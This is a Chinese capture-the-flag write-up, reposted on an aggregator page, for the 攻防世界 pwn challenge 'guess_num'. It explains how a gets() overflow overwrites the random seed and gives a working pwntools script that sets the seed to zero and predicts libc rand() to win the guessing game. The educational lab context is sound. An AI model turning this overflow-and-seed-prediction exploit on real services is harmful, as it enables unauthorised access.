其他分享
首页 > 其他分享> > 【攻防世界pwn-guess_num】

【攻防世界pwn-guess_num】

作者:互联网

下载文件后,首先检查保护

开启了金丝雀,不能溢出到返回地址

将文件拖入ida阅读

 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。

回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法

所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生成10个随机数,依次输入即可。随后开始编写脚本:

payload思路:用0x20的垃圾数据填充v7到seed[0]之间的空间,随后用p64(0)覆盖seed[0]的位置,表明此时读取seed[0],读出来的时0。然后用cdll运行C语言。

from pwn import *
from ctypes import *

io = remote("111.200.241.244",51836)
#用垃圾数据填充0x30到0x10之间的空间,接着用0覆盖seed
payload = b'a' * (0x30 - 0x10) + p64(0)
#发送payload,覆盖seed
io.recvuntil("Your name:")
io.sendline(payload)

#用python运行C语言,获取随机数
libc = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
libc.srand(0)
for  i in range(10):
	io.recvuntil("Please input your guess number:")
	num = str(libc.rand() % 6 +1)
	io.sendline(num)
io.interactive()

发送脚本,开始攻击:

 

 

标签:10,guess,libc,num,io,v7,pwn,seed,payload
来源: https://blog.csdn.net/a_silly_coder/article/details/122507574